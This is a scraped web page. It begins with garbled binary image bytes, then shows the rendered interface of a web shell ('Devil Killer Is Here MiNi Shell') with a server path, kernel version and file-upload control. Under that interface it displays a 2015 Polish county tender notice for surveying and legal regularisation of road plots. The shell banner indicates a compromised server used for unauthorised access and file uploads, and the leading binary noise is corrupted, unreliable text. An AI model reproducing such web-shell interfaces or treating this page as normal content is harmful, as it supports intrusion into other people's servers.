JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151005/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151005/261858-N-2015.html

<p class="kh_header"><b>Częstochowa: Sporządzenie opinii dotyczących zagospodarowania działek zajętych pod drogi oraz opracowanie dokumentacji geodezyjnej celem regulacji stanów prawnych działek Skarbu Państwa - 5 części</b><br>
<b>Numer ogłoszenia: 261858 - 2015; data zamieszczenia: 05.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Częstochowski , ul. Jana III Sobieskiego 9, 42-200 Częstochowa, woj. śląskie, tel. 034 3229100, 3229126, faks 034 3229111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie opinii dotyczących zagospodarowania działek zajętych pod drogi oraz opracowanie dokumentacji geodezyjnej celem regulacji stanów prawnych działek Skarbu Państwa - 5 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sporządzenie opinii dotyczących zagospodarowania działek zajętych pod drogi, opracowanie dokumentacji geodezyjnej celem regulacji stanów prawnych działek Skarbu Państwa oraz wykonanie projektu podziału działek 
w podziale na 5 części, zgodnie poniższym z opisem:

CZĘŚĆ 1
Polega na: 
a) wkreśleniu ze współrzędnych na zakupionych w PODGiK mapach zasadniczych granic ewidencyjnych 18 działek wymienionych w wykazie nr 1, stanowiącym załącznik do wytycznych technicznych, zajętych pod drogi powiatowe w trybie przepisów art.73 ustawy z dnia 13 października 1998 r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.) oraz wkreśleniu obustronnej granicy pasa drogowego według stanu na dzień 31 grudnia 1998 r.,

b) wkreśleniu na zakupionych w PODGiK mapach ewidencyjnych granic ewidencyjnych  4 działek położonych w Małusach Wielkich, gmina Mstów, wymienionych w wykazie nr 2, stanowiącym załącznik do wytycznych technicznych, zajętych pod drogi powiatowe w trybie przepisów art.73 ustawy z dnia 13 października 1998 r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.) oraz wkreśleniu obustronnej granicy pasa drogowego według stanu          na dzień 31 grudnia 1998 r., 
c) ustaleniu stanu zagospodarowania działek wymienionych w punktach a i b w dacie 31 grudnia 1998 r.  i obecnie oraz sporządzeniu z tej czynności opinii, ze wskazaniem dowodów, na podstawie których został ustalony stan zajętości pod pas drogowy w w/w dacie;
d) w zakresie niezbędnym do sporządzenia opinii, Wykonawca dokona weryfikacji danych w terenie.
CZĘŚĆ 2:
Polega na:
a)wkreśleniu ze współrzędnych na zakupionej w PODGiK w Częstochowie mapie zasadniczej granic ewidencyjnych działki nr 465/1 k.m.9 obręb Biskupice, gm. Olsztyn, zajętej pod drogę oraz wkreśleniu obustronnej granicy pasa drogowego według stanu na dzień 31 grudnia 1998 r.
b)ustaleniu stanu zagospodarowania w/w działki w dacie 31 grudnia 1998 r. i obecnie   oraz sporządzeniu z tej czynności opinii, ze wskazaniem dowodów, na podstawie których został ustalony stan zajętości pod pas drogowy w w/w dacie.
c)w zakresie niezbędnym do sporządzenia opinii, Wykonawca dokona weryfikacji danych  w terenie.
CZĘŚĆ 3:
Polega na:
a)wykonaniu projektu podziału działek:
- nr 35 k.m.1 obręb Jaskrów, gmina Mstów
- nr 80 k.m.4 obręb Kolonia Rędziny, gmina Rędziny. Zajętych pod drogę powiatową w trybie przepisów art.73 ustawy z dnia 13 października 1998 r. - Przepisy wprowadzające  ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.), z wykorzystaniem projektów podziału z  dnia 9 grudnia 2011r. znajdujących się w operatach w zasobie PODGiK w Częstochowie

b)sporządzeniu opinii dotyczących stanu zagospodarowania działek zajętych pod pas drogowy w dacie 31 grudnia 1998r. i obecnie, wydzielonych z nieruchomości określonych w punkcie a, ze wskazaniem dowodów, na podstawie których został ustalony stan zajętości pod pas drogowy w w/w dacie;

CZĘŚĆ 4:
Opracowanie dokumentacji geodezyjno - prawnej niezbędnej do uregulowania stanu prawnego w trybie zasiedzenia na rzecz Skarbu Państwa nieruchomości położonej w obrębie Huta Stara A, gmina Poczesna, oznaczonej jako działka nr 524 o pow. 0,0950 ha, a po wydaniu przez Sąd postanowienia stwierdzającego nabycie tytułu własności, dokonanie  stabilizacji granic trwałymi znakami granicznymi. 

CZĘŚĆ 5:
Zadanie 1- Wykonawca sporządzi i przekaże Zamawiającemu 2 egzemplarze uwierzytelnionego wykazu synchronizacyjnego niezbędnego do założenia księgi wieczystej dla działek drogowych, położonych w obrębie ewidencyjnym Staropole, gmina Przyrów, oznaczonych po scaleniu gruntów jako działki nr nr 157, 352. Wykazy będą przedstawiać działki przed scaleniem oraz po scaleniu. Przedmiotowe działki na podstawie decyzji scaleniowej nr 8436/1-13/88 z dnia 30.09.1988r., stanowią własnością  Skarbu Państwa. 

Zadanie 2-Wykonawca sporządzi i przekaże Zamawiającemu 2 egzemplarze uwierzytelnionego wykazu synchronizacyjnego niezbędnego do założenia księgi wieczystej dla działki drogowej położonej w obrębie ewidencyjnym Sygontka, gmina Przyrów, oznaczonej po scaleniu gruntów jako działka nr 2. Wykaz będzie przedstawiać działki przed scaleniem oraz po scaleniu. Przedmiotowa działka na podstawie decyzji scaleniowej nr GKG.6018/10/91 z dnia 15.11.1991r., stanowi własność  Skarbu Państwa. 

Zadanie 3 - Wykonawca sporządzi i przekaże Zamawiającemu 2 egzemplarze uwierzytelnionego wykazu synchronizacyjnego niezbędnego do założenia księgi wieczystej dla działek  drogowych położonych w obrębie ewidencyjnym Przyrów, gmina Przyrów, oznaczonych po scaleniu gruntów jako działki nr nr 364, 644, 648, 782, 833, 853, 1591. Wykazy będą przedstawiać działki przed scaleniem oraz po scaleniu. Przedmiotowe działki na podstawie decyzji scaleniowej nr Rlg-S.C.-471/22/79 z dnia 04.12.1979r., stanowią własnością Skarbu Państwa. 

Zadanie 4 - Wykonawca sporządzi i przekaże Zamawiającemu 2 egzemplarze uwierzytelnionego wykazu synchronizacyjnego niezbędnego do założenia księgi wieczystej dla działek  drogowych położonych w obrębie ewidencyjnym Przyrów, gmina Przyrów, oznaczonych po scaleniu gruntów jako działki nr nr 325, 327, 711, 907, 1456, 1506, 1509.  Wykazy będą przedstawiać działki przed scaleniem oraz po scaleniu. Przedmiotowe działki na podstawie decyzji scaleniowej nr Rlg-S.C.- 471/22/79 z dnia 04.12.1979r., stanowią własnością  Skarbu Państwa. 

Szczegółowe informacje dotyczące wszystkich części zamówienia znajdują się w SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1, 71.22.22.00-2, 71.35.40.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie właściwego oświadczenia stanowiącego załącznik
nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie właściwego oświadczenia stanowiącego załącznik
nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie właściwego oświadczenia stanowiącego załącznik
nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie właściwego oświadczenia dotyczącego wymaganych uprawnień osób, które będą uczestniczyć w wykonywaniu zamówienia stanowiącego załącznik nr 4 do SIWZ,
oraz ocena będzie dokonana na podstawie właściwego oświadczenia stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie właściwego oświadczenia stanowiącego załącznik
nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- druk oferty zgodny ze wzorem stanowiącym załącznik nr 1 do SIWZ
- pełnomocnictwo podmiotów występujących wspólnie (jeżeli dotyczy),
- pełnomocnictwo dla osoby/osób podpisującej ofertę i oświadczenia (jeśli uprawnienie tych  osób nie wynika z innych dokumentów dołączonych do oferty).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin wykonania zamówienia - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartych umów 
w stosunku do oferty, na podstawie której dokonano wyboru Wykonawcy.
Warunki takiej zmiany: zmiana terminu wykonania przedmiotu zamówienia wynikająca 
z przyczyn niezależnych od Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-czestochowski.4bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Częstochowie
ul. Jana III Sobieskiego 9
42-217 Częstochowa
e-maile: przetargi@czestochowa.powiat.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.10.2015 godzina 11:30, miejsce: Starostwo Powiatowe w Częstochowie
ul. Jana III Sobieskiego 9
42-217 Częstochowa
pok. 3 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Polega na: 
a) wkreśleniu ze współrzędnych na zakupionych w PODGiK mapach zasadniczych granic ewidencyjnych 18 działek wymienionych w wykazie nr 1, stanowiącym załącznik do wytycznych technicznych, zajętych pod drogi powiatowe w trybie przepisów art.73 ustawy z dnia 13 października 1998 r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.) oraz wkreśleniu obustronnej granicy pasa drogowego według stanu na dzień 31 grudnia 1998 r.,

b) wkreśleniu na zakupionych w PODGiK mapach ewidencyjnych granic ewidencyjnych  4 działek położonych w Małusach Wielkich, gmina Mstów, wymienionych w wykazie nr 2, stanowiącym załącznik do wytycznych technicznych, zajętych pod drogi powiatowe w trybie przepisów art.73 ustawy z dnia 13 października 1998 r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.) oraz wkreśleniu obustronnej granicy pasa drogowego według stanu          na dzień 31 grudnia 1998 r., 
c) ustaleniu stanu zagospodarowania działek wymienionych w punktach a i b w dacie 31 grudnia 1998 r.  i obecnie oraz sporządzeniu z tej czynności opinii, ze wskazaniem dowodów, na podstawie których został ustalony stan zajętości pod pas drogowy w w/w dacie;
d) w zakresie niezbędnym do sporządzenia opinii, Wykonawca dokona weryfikacji danych w terenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin wykonania zamówienia - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Polega na:
a)wkreśleniu ze współrzędnych na zakupionej w PODGiK w Częstochowie mapie zasadniczej granic ewidencyjnych działki nr 465/1 k.m.9 obręb Biskupice, gm. Olsztyn, zajętej pod drogę oraz wkreśleniu obustronnej granicy pasa drogowego według stanu na dzień 31 grudnia 1998 r.
b)ustaleniu stanu zagospodarowania w/w działki w dacie 31 grudnia 1998 r. i obecnie   oraz sporządzeniu z tej czynności opinii, ze wskazaniem dowodów, na podstawie których został ustalony stan zajętości pod pas drogowy w w/w dacie.
c)w zakresie niezbędnym do sporządzenia opinii, Wykonawca dokona weryfikacji danych  w terenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin wykonania zamówienia - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Polega na:
a)wykonaniu projektu podziału działek:
- nr 35 k.m.1 obręb Jaskrów, gmina Mstów
- nr 80 k.m.4 obręb Kolonia Rędziny, gmina Rędziny. Zajętych pod drogę powiatową w trybie przepisów art.73 ustawy z dnia 13 października 1998 r. - Przepisy wprowadzające  ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.), z wykorzystaniem projektów podziału z  dnia 9 grudnia 2011r. znajdujących się w operatach w zasobie PODGiK w Częstochowie

b)sporządzeniu opinii dotyczących stanu zagospodarowania działek zajętych pod pas drogowy w dacie 31 grudnia 1998r. i obecnie, wydzielonych z nieruchomości określonych w punkcie a, ze wskazaniem dowodów, na podstawie których został ustalony stan zajętości pod pas drogowy w w/w dacie;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin wykonania zamówienia - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji geodezyjno - prawnej niezbędnej do uregulowania stanu prawnego w trybie zasiedzenia na rzecz Skarbu Państwa nieruchomości położonej w obrębie Huta Stara A, gmina Poczesna, oznaczonej jako działka nr 524 o pow. 0,0950 ha, a po wydaniu przez Sąd postanowienia stwierdzającego nabycie tytułu własności, dokonanie  stabilizacji granic trwałymi znakami granicznymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin wykonania zamówienia - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 5 podzielona jest na następujące zadania:
Zadanie 1- Wykonawca sporządzi i przekaże Zamawiającemu 2 egzemplarze uwierzytelnionego wykazu synchronizacyjnego niezbędnego do założenia księgi wieczystej dla działek drogowych, położonych w obrębie ewidencyjnym Staropole, gmina Przyrów, oznaczonych po scaleniu gruntów jako działki nr nr 157, 352. Wykazy będą przedstawiać działki przed scaleniem oraz po scaleniu. Przedmiotowe działki na podstawie decyzji scaleniowej nr 8436/1-13/88 z dnia 30.09.1988r., stanowią własnością  Skarbu Państwa. 

Zadanie 2-Wykonawca sporządzi i przekaże Zamawiającemu 2 egzemplarze uwierzytelnionego wykazu synchronizacyjnego niezbędnego do założenia księgi wieczystej dla działki drogowej położonej w obrębie ewidencyjnym Sygontka, gmina Przyrów, oznaczonej po scaleniu gruntów jako działka nr 2. Wykaz będzie przedstawiać działki przed scaleniem oraz po scaleniu. Przedmiotowa działka na podstawie decyzji scaleniowej nr GKG.6018/10/91 z dnia 15.11.1991r., stanowi własność  Skarbu Państwa. 

